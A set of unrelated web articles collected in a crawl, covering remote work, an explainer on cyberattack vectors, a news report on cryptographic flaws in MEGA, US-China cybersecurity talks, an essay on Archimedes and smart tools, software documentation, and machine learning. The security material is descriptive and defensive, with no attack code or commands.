So how do you monitor productivity when you’re nowhere near your employees?
As with any operational changes of this magnitude, there may be pitfalls along the way. We want to help you avoid them. Here are some quick tips:
Now, these are just some of the high-level requirements for a successful work-from-home transition. There are a lot (I mean a LOT) of smaller details that need just as much planning.
Don’t worry, we’re not going to leave you out on the ledge to fend for yourself.
Next week we’ll be talking about all the ins and outs of setting up your team to successfully work from home. We’ll look at:
So, spend this time working through the planning process and getting organized. And we’ll see you back here next week. In the meantime, if you have any questions or need assistance setting things up, give us a call – we’re always happy to help.
Tired of talking about COVID-19 yet? Us, too. Let’s talk about a post-COVID world instead.
The past few months have been … ahem … a whirlwind. Your world has been flipped upside down. You, your staff, and your customers have all been forced to abide by “social distancing” rules, a concept that wasn’t even on your radar earlier this year.
And what happened when we all went home, and stayed home?
We went online, of course! For good, bad or indifferent, we all turned to our trusty interwebs. We logged on for entertainment and socialization, to shop, to do our banking, and even to keep virtual doctor appointments.
No matter what industry you’re in, your customers have been pulled into a digital vortex.
Sure, some may have already been tech savvy, but just as many weren’t ready for the pendulum to swing so far so fast.
What happened next? Your call centre blew up.
Yeah, ours did, too.
Countless businesses just like yours have felt the sudden influx of customer service inquiries since the brick and mortar doors (literally) closed indefinitely.
In all honesty, we’re impressed with how the public is adjusting to being in isolation, forced to fend for themselves online.
… the species that survives is the one that is able to adapt to and to adjust best to the changing environment in which it finds itself. - Darwin
Being in the web and IT space, we’re especially intrigued by how many businesses plan to continue down the digital path to customer self-service even after lockdown restrictions are lifted.
Let’s talk about how you can lighten the load on your customer service team. Here are three ways to help customers embrace digital transformation even after your physical doors reopen:
Those are just a few of the many ways to help customers embrace digital transformation. Your call centre team will thank you.
If you’re ready to get your ACT together, give us a buzz! | <urn:uuid:31823a26-abc7-4a4e-a98e-273d17b91d41> | CC-MAIN-2022-40 | https://act360.ca/category/it/tech-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00193.warc.gz | en | 0.950998 | 5,410 | 3.1875 | 3 |
Over the last few years, we have grown accustomed to hearing about cybersecurity incidents affecting companies of all scales and sizes. In 2021, a data breach cost an average of $4.24 million, up 10% from $3.86 million in 2020 — the highest percentage increase year-over-year in the past 17 years. Despite a robust cybersecurity perimeter in response to growing threats, cybercriminals always seem to find a way around it. How do they do it? They use increasingly complex attack vectors.
In this article, we’ll look at how cybercriminals use attack vectors as tools to exploit IT security vulnerabilities and execute their nefarious schemes. We’ll also list some simple security measures your company can put in place to counter threats from these attack vectors.
What Is Meant by Attack Vector?
An attack vector refers to any method or pathway a hacker may use to penetrate, infiltrate or compromise the IT infrastructure of the target entity.
In addition to exploiting vulnerabilities in the system, hackers also use attack vectors to trick humans into compromising security setups. Clue: phishing emails. Phishing ranks as the second most frequently used attack vector in 2021. The top spot goes to compromised credentials while the third goes to cloud misconfiguration.
A cybercriminal can deploy a multitude of attack vectors to deliver malicious payloads, such as viruses, worms and ransomware code, into a victim’s system and sabotage their operations. Compromised credentials, phishing emails and inadequate or missing encryption are some other examples of attack vectors.
Attack Vector vs. Attack Surface
There are times when you will see these two terms used interchangeably, but that isn’t correct.
An attack vector is a tool that cybercriminals use to launch a cyberattack while an attack surface is any point or points on the network area of a company that is broken through to launch the attack. The surface area increases as more endpoints, servers, switches, software applications or any other IT assets get configured to a network.
IBM’s Cost of Data Breach report 2021 found that costs of breaches were significantly lower for some companies with a more mature security posture and higher for companies lagging in areas such as security AI and automation, zero-trust and cloud security.
Attack Vector vs. Threat Vector
The terms attack vector and threat vector are interchangeable. As with an attack vector, a threat vector is a way to gain access to an unsecured attack surface such as an open port or an unpatched software vulnerability.
What Are the Different Types of Attack Vectors?
Cybercriminals are quick to invent new attack methods, which easily outsmart old defense mechanisms. In this section, we’ll discuss nine nasty attack vectors that can undermine your business.
1. Compromised Credentials
Compromised credentials are the most used attack vector, responsible for 20% of breaches in 2021. Usernames and passwords stolen from victims are the most common credentials used by threats actors. Cybercriminals can purchase these on the dark web or can trick unsuspecting individuals into giving them up. Hackers may also collect sensitive information from unwitting users by sending a link to a bogus website and requesting their login details.
2. Weak Passwords and Credentials
According to a security consultant, a single compromised password caused the downfall of Colonial Pipeline, a major oil pipeline company in the U.S., leading to a fuel shortage across the East Coast of the United States.
The best way to make passwords hard to guess is to change default passwords promptly and to create new passwords keeping best practices in mind. A strong, complex password should include uppercase, lowercase and special characters as well as numbers and symbols. According to research conducted by NordPass, Fortune 500 companies use passwords that can be hacked in less than a second. It’s also advisable to change passwords frequently since hackers can install keylogging software on a user’s system to obtain personally identifiable information (PII).
Hackers don’t just focus on system credentials used by employees. They also try to intercept passwords used by servers, network devices and security tools, gaining unfettered access to a company’s Active Directory credentials and other valuable databases.
3. Poor and Absent Encryption
Data encryption enables users to transform data into ciphertext before transferring it over a known or unknown network or storing it on a system, enabling only those with the password to decrypt and read it. Weak encryption is easy to break using brute force, whereas in the absence of encryption, data transfer occurs in plaintext, which can be easily intercepted or stolen by threat actors.
4. Cloud and Device Misconfiguration
According to The State of Cloud Security 2021 report, many data breaches that make headlines are caused by cloud misconfiguration errors. About 36% of cloud professionals surveyed for the report said their organization experienced a serious breach or leak of cloud data in the past year.
Cloud misconfigurations result from user-created settings that do not provide adequate security to cloud data. This can disable the privilege access settings, giving everyone on the network unfettered access to valuable data.
Device misconfiguration is another trouble spot for companies. As companies rely increasingly on robotics and internet-of-things (IoT) devices to carry out their tasks, a hardware hack can pave the way for cybercriminals.
About 80% of IT professionals say they are facing a significant increase in phishing attacks in 2021.
Phishing emails continue to be one of the most effective attack vectors. Phishing is a form of social engineering attack that involves using legitimate-looking emails to trick people into giving up their personal information or account credentials. About 90% of incidents resulting in data breaches begin with phishing emails.
While a phishing attack targets employees en masse, a spear-phishing attack targets top-level executives of a company with the aim to steal highly confidential and business-critical information to which only the highest-ranking executives have access.
6. Third-Party Vendors
Suppliers and vendors are also considered attack vectors since hackers can find weaknesses in their software to access the client’s network and launch a supply chain attack. In the event of a cyberattack on a third party that has access to sensitive client data, the consequences are unimaginable.
7. Software Vulnerabilities
There is no such thing as perfect software. Hence, even after a piece of software is released, companies continue to test for bugs and send patches to fix vulnerabilities.
A zero-day vulnerability is a flaw in a network or software that hasn’t been patched or for which a patch isn’t available. Hackers can exploit a zero-day vulnerability to install malicious software, like ransomware, that enables them to manipulate IT infrastructure remotely to spy on an organization’s activities or to disrupt operations.
There were a record-breaking 66 zero-day attacks found to be active in 2021 according to databases like the 0-day tracking project. This is almost double the total reported for 2020, and more than any other year on record.
8. Malicious Insiders
It takes about 231 days for breaches caused by malicious insiders to be identified, behind only compromised credentials at 250 days and business email compromise at 238 days.
As it stands, disgruntled employees already have access to their company’s system details, which they can use to launch cyberattacks or to sell credential information on the dark web. In some cases, insider attacks are not malicious in nature and can be due to a lack of care on the part of employees.
9. Trust Relationships
In order for a communication channel between two or more domains to be secure, there must be an established trust relationship. It allows users to access information from multiple domains with just one login. A trusted domain is one that authenticates the user while the others are called trusting domains. Lax security practices can result in users caching credentials on trusted domains, which can then be stolen and used to launch a cyberattack.
What Are the Different Attacks Launched With Attack Vectors?
Cybercriminals have access to a wide range of attack vectors for conducting business-breaking cyberattacks. Here are some of the most common and debilitating attacks launched using attack vectors.
1. Malware and Ransomware
Malware is an intrusive piece of software that enables cybercriminals to access and damage computing systems and networks severely. The infection can take the form of a virus, trojan horse, worm, spyware, adware, rootkit or the infamous ransomware.
The number of ransomware cases has been steadily increasing since 2016 and now accounts for 10% of all breaches. Ransomware is a type of malware that can be installed covertly on a computer system, preventing the victim from accessing it. As soon as authorized users lose access, cybercriminals either threaten to release data publicly or block usage unless a ransom is paid. Colonial Pipeline suffered a ransomware cyberattack earlier this year and had to pay a whopping $4.4 million to regain access to their network.
2. Distributed Denial-of-Service (DDoS) Attack
The purpose of a DDoS attack is to overload a victim’s system or network by sending bogus emails by the truckload. As a result of unusually high data traffic volumes, the network becomes paralyzed, rendering it unable to cope with new data requests. DDoS attacks typically exploit a vulnerability in one computer system, making it the DDoS master. The master system then infects other vulnerable systems with malware.
In critical industries, a server overload can result in the business going offline for hours, which can cause a dip in revenue and customer departure. Yandex, a Russian tech giant, recently said that its servers were the victims of the biggest DDoS attack ever recorded.
3. Brute Force
A brute force attack is a cryptographic hack in which cybercriminals use the computing power of their systems to crack usernames, passwords, encryption keys or any other authentication credentials for unauthorized use. Generally, the longer the password, the more combinations that will need to be tested.
4. Man-in-the-Middle Attacks
A man-in-the-middle attack occurs when an attacker inserts himself in the “middle” of an ongoing conversation or data transfer and pretends to be a legitimate participant. By eavesdropping on the communication, hackers can access crucial data, like login information, which they can modify for personal benefit.
Hackers can even use their position to send malicious links to legitimate parties to damage their systems and databases and to launch advanced persistent threats (APTs).
5. SQL Injections (SQLi)
SQL injection is an attack vector that exploits a security vulnerability in a program’s code. It allows hackers to inject malicious code into web queries, data-driven applications and, in some cases, servers and other backend infrastructure. Once the attacker has administrative rights over the database, it can spoof identity, reveal or destroy data, remove access from it or cause repudiation issues.
6. Cross-Site Scripting (XSS)
Cross-site scripting attacks, or XSS, exploit web security flaws by injecting malicious scripts into otherwise trustworthy websites to infect them with malware. An XSS attack occurs when malicious code is sent from a web application to an unknown user as a browser script. Not realizing that the script shouldn’t be trusted, users execute it, allowing hackers to access cookies and other sensitive information stored in the browser.
How to Reduce Risk From Attack Vectors?
Cyberattacks can be stopped in their tracks if companies follow strict security protocols. This is especially important given the remote and hybrid work environments we are working in today. Here are some core security practices that will help you stay one step ahead of cybercriminals while making your IT technicians’ jobs easier.
1. Utilize Strong Password and Credential Security
It’s tedious to remember multiple passwords. A simple combination of your name and date of birth may seem convenient but it certainly isn’t best practice. Creating a difficult password is a lot easier than figuring out how to recover from a cyberattack.
Here are some tips on how to create strong passwords:
• Usernames and passwords should be complex and should be reset frequently
• Do not use the same credentials across multiple applications and systems
• Two-factor authentication (2FA) is a must
2. Maintain Strong Data Encryption
Employees use multiple mobile devices and networks to exchange business information. This is inevitable. A strong encryption tool that uses 192- and 256-bit keys for data encryption is a great way to combat threats from cybercriminals.
3. Update Systems and Install Patches Regularly
Cybercriminals love exploiting unpatched software vulnerabilities for zero-day attacks. Moreover, they continue exploiting the vulnerability for months, resulting in irreversible damage. When you use Kaseya VSA, you can automate patch management and provide your business with an extra layer of security. Organizations can reduce the likelihood of breaches by 41% if they deploy patches promptly.
Did you know that coordination problems between teams cause many organizations to lose about 12 days when implementing a patch? VSA enables the creation of policy profiles for the approval, review or rejection of patch updates.
4. Phishing and Cyber Awareness Training
Cybercriminals can take advantage of human vulnerabilities to launch large-scale cyberattacks and cripple business operations. Train your employees regularly to look out for attack vectors like phishing emails or fake websites so that they’ll be sharper when it comes to spotting them.
5. Audit Security Configurations
Creating a robust cybersecurity infrastructure is the first step in the fight against rampant cybercrime. Nevertheless, maintaining the availability of the infrastructure and regularly fixing all vulnerabilities is a never-ending undertaking. Security audits should be performed at least quarterly and having an external auditor to conduct the audit will ensure nothing slips through the cracks.
6. Watertight BYOD Policies
We are entering an era of remote and hybrid work. As a result, companies are embracing the bring your own device (BYOD) culture because it has been shown to boost productivity and employee happiness. However, if BYOD policies are not secure, it could open the doors for cybercriminals to penetrate a company’s infrastructure. It is possible to protect your information from cybercriminals by storing it in a secure cloud environment or on a server and allowing only VPN-connected devices to access it.
Minimize Danger From Attack Vectors With Kaseya
To protect your employees and business from complex cyberattacks, you need the latest security tools in your arsenal.
Even though antivirus (AV), antimalware (AM) and firewall solutions are essential, they are only your first line of defense against cybercrime. This is where Kaseya VSA comes in — a top-of-the-line unified remote monitoring and management solution (uRMM) that lets you manage core IT security functions from a single pane of glass.
VSA helps you ensure security patches are deployed on time, reducing the attack surface. In addition, it provides complete insight into IT assets while enabling backup management and also keeps endpoints secure through the use of the most current AV/AM solutions. You also benefit from Kaseya VSA’s built-in security features, such as two-factor authentication, which allows you to improve IT efficiency.
Having the right tool by your side allows you to monitor IT assets 24/7 as well as identify and address any suspicious activity in real time. To learn more, request a free demo today. | <urn:uuid:251b8bb9-e5d6-410e-a402-ee9f706f4d47> | CC-MAIN-2022-40 | https://www.kaseya.com/blog/2021/10/28/attack-vectors/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00193.warc.gz | en | 0.919515 | 3,229 | 3.015625 | 3 |
“All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encryption key. MEGA does not have access to your password or your data. Using a strong and unique password will ensure that your data is protected from being hacked and gives you total confidence that your information will remain just that – yours.”
But there's a problem. A Swiss team of researchers has just proved those claims wrong.
And that's not all. The research went one step further, finding that an attacker could insert malicious files into the storage, passing all authenticity checks of the client.
Researchers at the Department of Computer Science of the ETH Zurich in Zurich, Switzerland reviewed the security of MEGA and found significant issues in how it uses cryptography.
These findings could lead to devastating attacks on the confidentiality and integrity of user data in the MEGA cloud.
The MEGA client derives an authentication key and an encryption key from the password. The authentication key identifies users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. Every account has a set of asymmetric keys: An RSA key pair for sharing data, a Curve25519 key pair for exchanging chat keys for MEGA’s chat functionality, and an Ed25519 key pair for signing the other keys. Furthermore, the client generates a new key for every file or folder (collectively referred to as nodes) uploaded by the user.
Long story short, all the keys are derived in one way or another from the password. And all the keys get stored on MEGA’s servers to support access from multiple devices.
Ciphertext is encrypted text transformed from plaintext using an encryption algorithm. The researchers built two attacks based on the lack of integrity protection of ciphertexts containing keys, and two further attacks to breach the integrity of file ciphertexts and allow a malicious service provider to insert chosen files into a user's cloud storage.
Due to the flawed integrity protection, a malicious service provider can recover a user’s private RSA share key (used to share file and folder keys) over 512 login attempts. The number is 512 because of the RSA-CRT implementation used by MEGA clients to build an oracle that leaks one bit of information per login attempt about a factor of the RSA modulus.
As a result the malicious service provider can recover any plaintext encrypted with AES-ECB under a user’s master key. This includes all node keys used for encrypting files and folders. As a consequence, the confidentiality of all user data protected by these keys, such as files and chat messages, is lost.
Based on the first two attacks, a malicious service provider can construct an encrypted file. The user cannot demonstrate that they didn't upload the forged data because the files and keys are indistinguishable from genuinely uploaded ones. It needs no further explanation that introducing a malicious file in such an attack could further compromise not only the user’s system, but also for those the user has shared their files or folders with.
MEGA acknowledged the issue on March 24, 2022, and released patches on June 21, 2022, awarding the researchers a bug bounty. But MEGA's fix differs greatly from what the researchers proposed, patching only for the first attack alone since the other attacks rely on the first one.
Since that does not fix the key reuse issue, lack of integrity checks, and other systemic problems the researchers identified, this remains a source of concern for them.
As a regular MEGA user there is no reason to worry about these flaws, especially if you haven’t logged in more than 512 times. An attacker would need to have control over MEGA’s API servers or TLS connections without being noticed to perform any of these attacks.
Anyone interested in more technical details, can read the researcher’s paper. | <urn:uuid:1bf30f6b-2cc4-41d5-8dfd-30e2881114d2> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2022/06/mega-claims-it-cant-decrypt-your-files-but-someones-managed-to | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00193.warc.gz | en | 0.922254 | 826 | 2.765625 | 3 |
The U.S. and China have agreed to begin working together to cooperate on cybersecurity. The two countries have reached an agreement that something must be done to mitigate this issue which has become more and more troublesome over the past several years.
A great deal of progress regarding the issue of cybersecurity was made during the first high-level meeting between the U.S. and China on the subject. Both countries have agreed to guidelines on sharing computer security information, a hotline open to discuss issues that may arise, a joint cybersecurity exercise and a promise to continue their dialog on concerns they both share such as the theft of proprietary information and trade secrets.
In the past the U.S. and China have had a very trying relationship in regard to cybersecurity. Tensions between them began to rise in 2010 when Google accused Chinese based hackers of directly stealing their intellectual property. Then in 2014, the U.S. Justice department charged five members of People's Liberation Army with stealing trade secrets from companies based in U.S. It is commonly believed by many security experts and tech companies that the Chinese government has sanctioned and even authorised the hacking of both Western companies and even their governments although the Chinese government has consistently denied these allegations.
Top-level U.S. and Chinese officials were present for the agreement that was held in Washington D.C. and both countries plan to meet again in Beijing in May of 2016.
Image Credit: Flickr/Philip Jägenstedt | <urn:uuid:7f51f226-7d5d-46c6-a32c-a48d00a2c244> | CC-MAIN-2022-40 | https://www.itproportal.com/2015/12/03/us-and-china-agree-to-work-together-on-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00193.warc.gz | en | 0.982678 | 295 | 2.984375 | 3 |
Mad Dog 21/21: Torque Is Cheap
October 26, 2015 Hesh Wiener
“Screw it,” said Archimedes of Syracuse, refusing to surrender to the gravity of the situation. Around 250 B.C., he developed a water pump that converted torque to lift. It was a helix inside a cylinder, a progenitor of propellers and augers. Archimedes also devised ingenious ways to calculate volume and mass. Archimedes’ two principal pursuits, applied physics and applied math, are as important today as ever, particularly for IBM’s current passion, the Internet of Things.
The “eureka” story has been around a long time. Notably, an essay on floating bodies that very likely originated with Archimedes appears in a palimpsest, a manuscript on parchment that recycled an older text on the costly medium. In this case, the more recent text was a 13th century prayer book. The older, original text of what has come to be called the Archimedes Palimpsest is a 10th century compendium of various works by the great Greek mathematician passed down through the generations. Although the palimpsest was created 1,200 years after Archimedes died and overwritten 300 years later, it is believed by scholars to be an authentic rendition. It is written in Byzantine Greek, a linguistic descendant of the Doric Greek of the Greeks living in Sicily during Archimedes’ lifetime.
The palimpsest, which includes seven treatises, the most relevant called On Floating Bodies, provides an academic foundation for the colorful tale of Archimedes and the crown. Basically, Hiero, the ruler of Sicily, worried that a crown made for him was a fake, made partially of silver rather than the pure gold the king had given his goldsmith. Hiero asked Archimedes to figure out a way to test the purity of the gold in the crown without destroying it. Archimedes had the problem on his mind when he took a bath and as he noticed the way the water level rose as he got into the tub, he had an insight. He figured out that the crown would displace the same amount of water as a bar or lump of pure gold with the same volume . . . if the crown was pure gold. If, however, the crown was part silver, which is less dense than gold, it would have to have a larger volume to reach the correct weight and thus, if immersed, would displace more water than a pure gold crown of the same weight.
So, the testing process came to this: Archimedes would get pure gold of the exact weight given by the king to the goldsmith. He would then put the gold in a vessel and fill the vessel to its brim with water. Next, he would remove the gold leaving the water in place. Finally he would put the crown in the water. If the water rose to the same level the crown had the correct volume and it was therefore pure gold. If, on the other hand, the vessel overflowed, the overflow would have the same volume as the excess volume occupied by the impure crown. This would be the case no matter how ornate the crown might be, whatever its shape.
When Archimedes, sitting in a tub, came up with the scheme he is said to have jumped out of the bath and run naked through the streets of Syracuse shouting, “eureka,” which means “I found it.” He seems to have found more than a method of assay. As the story goes, the crown was in fact a fake. The goldsmith had to answer to the king. Clever Archimedes was the hero of the day.
Many matters involving the determination of volume were of paramount importance to Archimedes, and a sculpture referring to his famous proof that a sphere enclosed in a cylinder of the same height has 2/3 the cylinder’s volume–and 2/3 of its surface area, too–was put on his tomb. But then the tomb’s location was apparently lost. It was rediscovered a century or so after Archimedes’ death by the Roman orator Marcus Tullius Cicero. A connection of Cicero to Sicily is preserved in, of all places, the Finger Lakes district of central New York state, where the town of Tully, named for Cicero, with its intellectual resources, is situated a half hour’s drive from the city of Syracuse.
Archimedes is also famous in myth and fact for the development of war machines to defend the port of Syracuse. He is credited with the creation of catapults and of cranes that could capsize or sink ships nearing the walls of the port. These machines were based on Archimedes’ understanding of levers and pulleys, on his mastery of torque.
For quite a long time there were few improvements made to the devices invented, improved, or perfected by Archimedes, who was far ahead of his times. Of all the technologies advanced by Archimedes, the screw has arguably been the slowest to mature. Screw pumps made today, used for irrigation, are pretty much the same as the ones devised by Archimedes. But the technology of screw fasteners continues to evolve to this very day, and with it the machines used to drive screws.
In Archimedes’ time and for centuries thereafter, the most widespread practical application of the screw was to turn torque into pressure, powering presses used to make olive oil and to extract juice from fruit. The screws in these presses were wooden and quite large, and this was the state of the art more than 1600 years later when screw mechanisms were used to actuate Gutenberg’s printing press. Small metal screws, so widely used today, simply didn’t exist until the Renaissance. The metalworking technologies and skills involved in the manufacture of screws arose in Europe during the 14th and 15th centuries. One well-known application, even several hundred years ago when screws were painstakingly made by hand, was in the assembly of guns.
At the time, the fasteners used in most other applications, from carpentry to construction to shipbuilding, were nails or pegs, items that are a lot simpler to manufacture. While large wood lathes predate Archimedes, smaller lathes suitable for metalworking were developed much later. Canon whose barrels were cut with a boring machine, a cousin of the lathe, didn’t appear until the 18th century.
Even when lathes and thread-cutting machines became widely available during the Industrial Revolution, for quite some time the only screws that could be mass produced were had cylindrical rather than tapered shafts, the kind commonly called machine screws. Finally, in the mid-19th century, inventors perfected machines to economically cut tapered screws that could be used in wood or metal that wasn’t threaded before fastening. Even then, most screws were of poor and inconsistent quality, which held back the advancement of manufacturing. Eventually, developments such as the Robertson square drive screw, adapted by, among others, Ford for use in its Model T cars, brought about permanent advancements in the mass production of complex machines.
Today, a hundred years after Robertson permanently elevated fastener technology to a higher level, the tools used to build (and repair) most everything are finally gaining the sophistication to take advantage of leading edge fasteners. A key element in this process has been the adoption of electronic technologies widely used elsewhere, such as in smartphones, to improve the versatility of hand tools.
Currently, everyone from professional tradesmen to home do-it-yourselfers seems to be migrating from the use of nails driven by hammers (and nail guns) to high-technology screws and tools to insert them.
Modern power screwdrivers sense the operator’s hand motion and amplify it. These tools react when nudged into action, turning clockwise or counter-clockwise in response to the user’s hand motion. When they are running they light the work area. These tools don’t yet have vision systems of their own and instead depend on the operator’s eye-to-hand coordination for guidance, but smarter screwdrivers with capabilities that resemble those in factory floor robots are on the way. Handheld power screwdrivers use non-slip fast change chucks that accept a wide variety of bits. These tools can not only drive screws, they can also drill and countersink holes or spin nuts onto bolts.
These gadgets are catching like wildfire, not only because they are so ingeniously engineered but also because they are very inexpensive. Small power screwdrivers can cost as little as $20, although some of the more upscale models can cost close to $100. Even so, these tools are widely viewed as items of immense practical value because they are such amazing time-savers.
When people need more powerful tools they move up a level to cordless, electronically controlled drill/drivers, impact drivers, and hammer drivers. These power tools weigh just a couple pounds apiece and typically cost only less than $150 per tool. Nevertheless, they enable home builders to efficiently install framing, mount drywall and put together wooden decks; they quickly pay for themselves. Moreover, the resultant work is far sturdier than comparable work done with hammers and nails. To pick just one simple example, a wooden deck built with nails often warps over time, lifting planks and increasing maintenance costs. The same boards held in place by screws are very unlikely to break loose even though time and weather produce substantial stresses within each plank, putting a lid on repair costs.
To control their motors and manage their use of power, handheld power tools use microprocessors and firmware similar to the technology in mobile communications devices. Like power screwdrivers, drills and drivers have work area lights but lack vision input. But they do have very effective electromechanical drives. All but the least costly power tools made today use light and capable lithium-ion battery packs. Motors on moderately priced tools use brush-and-commutator designs that can be controlled with relatively primitive circuitry. Newer and thus far more costly tools have brushless motors that take advantage of rare earth permanent magnets and very clever switching circuitry to provide quite a bit of torque, very long battery life, and the technical possibility of incorporating load sensors, temperature sensors, rotational velocity sensors, and other smart or self-aware features. The upshot is that a small handheld driver with smart torque management can sink 3-inch lag bolts all day long, if the operator has a spare battery and rapid charger on hand. Moreover, a smart driver using high-tech screws used by a craftsman with decent skills and a bit of experience will hardly ever tear apart a screw head or breaks the shaft of a fastener.
Today’s tools require manual adjustment of their clutch mechanisms, typically with a ring on the chuck that is a bit like the adjustment ring on a manual camera. But the next step, the centralized and automated setting of tools to match for each phase of a construction project, is just around the corner. The missing elements are jobsite or workshop servers . . . and data radios in the tools. It is possible, even likely, that jobsite local smart tool networks will be based on tablets and communications technologies similar to the ones used in smart home security systems. But right now the situation is in flux.
Technology vendors, including IBM, can get in on the ground floor as construction and workshop technology evolves to plug handhold tools and the craftsmen using them into the Internet of Things. Sure, jobsite automation has a lot in common with factory automation, giving industrial automation suppliers an advantage. But sometimes technology leaps ahead in ways that leave legacy vendors beached while providing new entrants outstanding opportunities. The automation of tools and workshops could rhyme with the way audio entertainment evolved from physical tape distribution to streaming distribution, rapidly shifting the entire business from the Walkman to the iPod.
It looks like there is a huge opportunity about to emerge, but until the Internet of Workshop Things reveals its Steve Jobs and its iPod, nobody can guess what company will be to the IoT what Apple was to personal media players (and much more). When it comes to the advancement of industrial computing, IBM, the Trumpish trumpeter of the Internet of Things, is nowhere to be seen. IBM may be happy to set up offices in snazzy San Francisco or the geek elite’s Kendall Square, but the company just doesn’t seem to be very interested in actually getting any of its employees’ hands dirty. And that is not a good way for IBM to become a live player in the Internet of Things.
Maybe IBM can win some or all of this market by working it top down, providing service backbones to Home Depot, Lowe’s, Tractor Supply, Ace Hardware, and their ilk, possibly finding a way to tap into Harbor Freight.
When it comes to automating workshop tools and tying them into cloud-based systems that can learn procedures and ultimately help the craftsmen using the tools, there is some pretty advanced communication technology already in use when machinists, mechanics, carpenters, and even DIY enthusiasts want to prepare work and later measure the outcome of workshop or factory activities.
Builders routinely use laser-based devices to measure distances, areas and volume and to read angles, ascertaining what is level and what is plumb. Some of these devices can talk to phones, tablets or PCs. Machinists have long since measured distances and sizes with electronic micrometers and calipers that talk to computing devices via USB interfaces, but until recently the only widely available devices were those built by the world’s leaders in metrology, such as Mitutoyo or Fowler. Today, versions of these devices for less demanding applications are cheap enough for the home woodworker or mechanically inclined hobbyist.
So, there seem to be strong indications that networks of tools and instruments, if not the whole Internet of Things, already pretty routine in factories, will soon become a practical aspect of industrial processes carried out in the field, such as homebuilding, and in small workshops, such as auto repair centers. Where there are benefits ranging from improved personnel management to more accurate monitoring of tools and materials, smart and connected devices will appear in the hands of contractors, including solo craftsmen, and ordinary homeowners who wish to take on house and garden maintenance tasks.
To one observer, it looks like the development of this part of the Internet of Things is going to be a bottom-up more than a top-down process. If IBM wants to be a part of it, it can try to win over the planners shaping the future of tool vendors or perhaps tool makers like Bosch, Makita or Stanley, it may have to find a way to hunker down with the blue collar folk and their upstream suppliers. It might not be that difficult, even if it seems unlikely. The company’s big shots could start by visiting one of their own machine shops to see how IBM’s own Things might be Internetted. There isn’t a machine shop in white-collar Armonk, but IBM might still have one in what’s left of Pokie or maybe Endicott, which aren’t all that far away, in case anyone at headquarters actually cares, and in case they haven’t yet gotten around to turning off the last of the lights in the old factories. | <urn:uuid:769a7c9c-e5df-4117-87e8-19f1fb84496f> | CC-MAIN-2022-40 | https://www.itjungle.com/2015/10/26/tfh102615-story04/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00193.warc.gz | en | 0.964418 | 3,197 | 2.859375 | 3 |
Using Split action
Use the Split action to split the specified string into multiple strings and store the output in a list variable.
To split a string into multiple strings, perform these steps:
- In the Actions palette, double-click or drag the Split action from the String package.
- In the Source string field, specify the source string.
In the Delimiter field, specify the character to split
For example, comma (,), semicolon (;), pipe (|), slash (/ \), newline character (\n), or space.
In the delimiter text box, the newline character is not accepted for the Enter key as a line break. In that case, you can either press F2 and select Enter - String from String section or input the $String:Enter$ variable.
In the Delimiter is field, select one of the
- Case sensitive: The delimiter is case-sensitive.
- Not case sensitive: The delimiter is not case-sensitive.
In the Split into substrings field, select one of the
- All possible: Splits the source string into as
many substrings as possible.
For example, if the original string is a,b,c,d, each character becomes a substring.
- Only: Limits the number of substrings.
For example, if the original string is a,b,c,d, and you enter 3, the output is three strings: a, b, and c,d.
- All possible: Splits the source string into as many substrings as possible.
- In the Assign the output to variable list, specify the list variable.
- Click Save. | <urn:uuid:81e5bded-2598-45f1-a386-cf270ef3637d> | CC-MAIN-2022-40 | https://docs.automationanywhere.com/bundle/enterprise-v2019/page/enterprise-cloud/topics/aae-client/bot-creator/commands/cloud-using-split-action.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00193.warc.gz | en | 0.701535 | 373 | 2.671875 | 3 |
Content Copyright © 2017 Bloor. All Rights Reserved.
Also posted on: Accessibility
Both machine and deep learning are very hot topics. However, at heart, neither is particularly revolutionary.
Machine learning is essentially about self-training data mining. Data mining algorithms and the tools (SPSS, SAS, Statistica and so on) to build them have been around for thirty or forty years. What used to happen was that what we now call a data scientist had a problem to solve such as making better recommendations, identifying fraud and so on. The data scientist would deploy various data mining algorithms against the problem set, train them (that is, feed them with lots of relevant data) and determine which algorithm best suited the problem at hand, and then that model would be deployed. Best practice meant that because things like buying patterns change over time, then the data scientist would revisit the problem set on a periodic basis to ensure that this algorithm remained the best fit and either to update the algorithm or replace it, as appropriate.
What machine learning does is to automate the process of improving the existing deployed algorithm. Best practice would now mean periodically checking that this is still the best algorithm but no longer requires checking that the algorithm is performing optimally.
From a business perspective this is very important. It means that recommendation engines gradually get better over time. It means that false positives and false negatives (whether in fraud detection or other environments such as name and address matching) incrementally improve.
Deep learning, in effect, goes one step further, by automating the process of creating the best algorithm for the task in hand. This doesn’t actually do anything directly for the business that machine learning does not: for example, it does not reduce the rate of false positives any more than a well-designed machine learning algorithm might do. What it does do is to remove the need to develop and test multiple algorithms to see which is the best fit against the problem dataset. In other words, to a large extent it removes the data scientist from the equation. Taken to its logical conclusion this means that deep learning will ultimately automate the role of the data scientist out of existence. | <urn:uuid:2662e3a0-fc36-4e66-bac8-a7e7168aaec2> | CC-MAIN-2022-40 | https://www.bloorresearch.com/2017/10/machinedeep-learning-debunking-the-hype/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00193.warc.gz | en | 0.956253 | 441 | 2.921875 | 3 |
The study of philosophy, at least in the past, has involved asking questions that seem, on the surface, to be, well, irrelevant. After all, is it really all that important to know “whether a ship that had been restored by replacing every single wooden part” remains the same ship? That’s the question Plutarch asked in Life of Theseus and thereafter became known as Theseus’ paradox. More generally stated, it asks “whether an object that has had all of its components replaced remains fundamentally the same object.” (Ship of Theseus, Wikipedia)
